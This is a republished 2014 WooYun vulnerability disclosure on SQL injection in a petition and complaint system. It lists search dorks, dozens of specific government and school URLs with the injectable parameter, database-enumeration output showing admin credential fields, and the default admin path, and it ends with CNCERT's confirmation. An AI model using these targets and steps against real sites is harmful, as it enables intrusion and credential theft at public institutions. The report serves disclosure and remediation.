[公开漏洞]某套信访系统通用SQL注入影响大量政府学校网站

来源:WooYun 浏览:789次 时间:2014-06-13
做网站找雨过天晴工作室
某套信访系统通用SQL注入影响大量政府学校网站 相关厂商: Cncert国家互联网应急中心 漏洞作者:U神 提交时间:2014-03-15 16:48 公开时间:2014-06-13 16:49 漏洞类型:SQL注射漏洞 危害等级:高 自评Rank:20 漏洞状态: 已交由第三方厂商(cncert国家互联网应急中心)处理 漏洞来源:http://www.wooyun.org Tags标签: 无 漏洞详情 披露状态:

2014-03-15:细节已通知厂商并且等待厂商处理中
2014-03-20:厂商已经确认,细节仅向厂商公开
2014-03-23:细节向第三方安全合作伙伴开放
2014-03-30:细节向核心白帽子及相关领域专家公开
2014-04-09:细节向普通白帽子公开
2014-04-29:细节向实习白帽子公开
2014-06-13:细节向公众公开

简要描述:

详细说明:

#1.这套系统一般作为信访站、信箱站、投诉站等,大量的政府网、学校网站正在使用该系统,该系统存在大量的SQL注入漏洞,绝大多数都是基于子目录搭建的!那么就可以直接影响到主站.并且后台很容易找到!

Google or Baidu :

inurl:ruleshow.asp

inurl:visitshow.asp

inurl:visitseacrch.asp





以下是政府机构的网站,其中【】中填写的是主站的网站名称!所以说虽然建立于子目录但却威胁到了主站的安全!



http://www.dbs110.gov.cn/wsjb/visitshow.asp?id=49  调兵山市公安局网上举报系统 【调兵山市公安局】

http://www.antu.gov.cn/xinfang/visitshow.asp?id=13  安图县人民政府信访系统  【安图政务信息网】

http://www.jyj.changzhi.gov.cn/jzxx/visitshow.asp?id=17  长治市教育局局长信箱  【长治市教育局】

http://www.yiliang.gov.cn/xf/visitshow.asp?id=2 宜良县人民政府网上信访   【宜良县人民政府网】

http://www.xjgl.gov.cn/xzxx/visitshow.asp?id=25  巩留县人民政府=>县长信箱  【巩留县人民政府】 

http://www.qyx.gov.cn/wsxinfang/visitshow.asp?id=130 清苑县人民政府信访系统  【清苑县人民政府】

http://www.qjetc.gov.cn/sfwt/visitshow.asp?id=12 曲靖市工业信息化委员会 四风问题征求意见箱  【曲靖市工业和信息化委员会政务网】

http://www.nbgt.gov.cn/aspx/nbgtxf/visitshow.asp?id=27 南部县国土资源局-在线信访  【四川省南部县国土资源局】

http://www.dbecz.gov.cn/xinfan/visitshow.asp?id=13 成都温江区人大信访系统  【丹东边境经济合作区】

http://www.sidui.gov.cn/xinfang1/ruleshow.asp?id=19 连云港市灌云县四队镇信访系统--案例公开 【四队镇人民政府】

http://www.dxmzj.gov.cn/jzxx/ruleshow.asp?id=1  达县民政局 局长信箱 【达县民政局】

http://www.cdws.gov.cn/web/mail_book/visitshow.asp?id=24 承德卫生局 社会监督网络信箱系统  【承德卫生局】

http://www.czjqjcy.gov.cn/jzxx/visitshow.asp?id=12  长治市教育局局长信箱  【长治市教育局】

http://www.lxzjc.gov.cn/jubao/visitshow.asp?id=35 临夏回族自治州人民检察院-网上举报中心  【临夏回族自治州人民检察院】

http://www.yjxzzb.gov.cn/ruleshow.asp?ID=26  中共印江县委组织部12380举报网站  【中共印江县委组织部】

http://wsj.hcq.gov.cn/webxfasp/visitseacrch.asp   惠城区卫生局网上信访  【惠城区卫生局】 

http://www.jsjhcz.gov.cn/czyx/visitshow.asp?id=10 党的群众路线教育实践活动意见箱  【建湖县财政局】

http://www.dyqxfj.gov.cn/xfsys/visitshow.asp?id=81 中共东营区委、东营区人民政府信访局  【中共东营区委、东营区人民政府】

http://www.flqzgzw.gov.cn/xf/visitshow.asp?id=69 重庆市涪陵区网上信访系统  【涪陵群众工作网】

http://www.jxqgb.gov.cn/wangshangxinfang/visitshow.asp?id=14 成都温江区人大信访系统  【绩溪县委群众工作部】

http://www.ysland.gov.cn/xinfang/visitshow.asp?id=19 偃师市国土资源局网上信访系统  【偃师市国土资源局】

http://www.lbgkfq.gov.cn/xinfan/visitshow.asp?id=15 海安滨海新区网上信访  【江苏省海安滨海新区】

http://www.ggpolice.gov.cn/wyhswysb1/ruleshow.asp?id=2 高港网上110  【高港网上110】

http://www.qyqga.gov.cn/xinfan/visitshow.asp?id=15 青原区公安局网上信访--信访查找  【吉安市公安局青原分局】

http://www.njxzzx.org/njxfj/wsxf/ruleshow.asp?id=8 南靖县信访局网上信访系统  【南靖县行政服务中心】

http://wzbtv.com/sfrx/visitshow.asp?id=82 三风热线信访系统  【重庆万州广播电视台】

http://www.lyjr110.cn/ts/visitshow.asp?id=6  龙游县金融消费投诉网  【金融服务110】

http://www.julu110.cn/xinfang/visitshow.asp?id=7 巨鹿县公安局网上信访接待室  【巨鹿公安网】

http://www.dbecz.gov.cn/xinfan/visitshow.asp?id=12  丹东边境经济合作区网上投诉  【丹东边境经济合作区】

http://www.nxky.cn/tsxt/ruleshow.asp?id=3  汉中运输总公司宁西有限公司  【陕西汉中宁西实业集团】

http://www.lsyhjd.com/xinfan/visitshow.asp?id=81 立山区友好街道办事处信访系统  【立山区友好街道办事处】

http://www.jxqxj.com/xinfan/visitshow.asp?id=8 介休气象局行政审批  【介休气象局网】

http://12366.qzww.com:88/xf/visitshow.asp?id=7  益税通纳税服务  【青州国税】

http://www.hyls.cn/xf/visitshow.asp?id=3 四川省华蓥市粮食局网上信访  【华蓥粮食局】

http://hlqqzemail.host.aixin114.com/visitshow.asp?id=2 华龙区信箱 【华龙区信箱】

http://www.jxqgb.gov.cn/wangshangxinfang/visitshow.asp?id=14 成都温江区人大信访系统  【绩溪县委群众工作部】

http://bqxmzj.com/xf/visitshow.asp?id=10 拜泉县民政局  【拜泉县民政局】

http://60.211.253.196:81/jwxx/visitshow.asp?id=15 金乡廉政网纪委信箱  【金乡廉政网】

http://oa.glszyz.org/v_tousu/visitshow.asp?id=12  橄榄树志愿者团队投诉系统  【橄榄树志愿者网上 工作平台】

http://www.pxkss.com/visitshow.asp?id=22 蒲县看守所网上办事大厅  【蒲县看守所网】





#2.以下是其它教育学校机构存在该系统的网站例举:

http://www.cijiedu.com/xzxx/visitshow.asp?id=67 慈吉小学校长信箱  

http://210.30.208.159/sos/visitshow.asp?id=14  外国语学院学生生活SOS平台

http://222.90.76.146/jjsh/ts/ruleshow.asp?id=4 西安外国语大学管理效能投诉受理中心

http://www.zsms.cc/xzmail/visitshow.asp?id=26 舟山航海学校校长信箱

http://www.myesms.net/zf/visitshow.asp?id=14 绵阳实验高级中学校长信箱

http://www.gysy1.com/mail/visitshow.asp?id=31 贵阳市第一实验小学—校长信箱

http://syesx.syjyw.net/email/visitshow.asp?id=13  三元区第二实验小学校长信箱

http://www.wzgxzx.com/xzxx/visitshow.asp?id=12 瓯海区郭溪中学校长信箱

http://weiquan.jlccsme.com/visitshow.asp?id=23 长春市中小企业法律在线系统

漏洞证明:

#3.SQL注入证明如下(以第一个为例):



Database: Microsoft_Access_masterdb

[2 tables]

+-------+

| admin |

| users |

+-------+





字段(跑的太慢了,就跑到这里吧)

[15:47:35] [INFO] retrieved: id

[15:47:37] [INFO] retrieved: username

[15:47:39] [INFO] retrieved: userid

[15:49:17] [INFO] retrieved: password





#4.默认后台地址:http://****.cn/***/admin/Login.asp

01.jpg



表有两个一个是admin、一个是user,从admin中跑出字段:username、userid、password已经证明有后台帐号密码了,而且默认后台是admin/login.asp,进入后台拿shell已经不是小事啦~然后有了webshell就可以跨到根目录查看主站的文件啦~

修复方案:

PS:涉及到政府教育机构网站,仅跑到字段未深入,未拿shell,请Cncert国家互联网应急中心继续深入下去!

版权声明:转载请注明来源 U神@乌云 漏洞回应 厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-03-20 22:49

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给辽宁、山东、山西、河北等多个分中心(重点先处置地市级网站)。同时,也通过CNCERT向监察部信息中心通报(暂未测试得到监察部门案例,但根据业务相关性,也进行了通报).涉及信息泄露风险,rank 20

最新状态:

暂无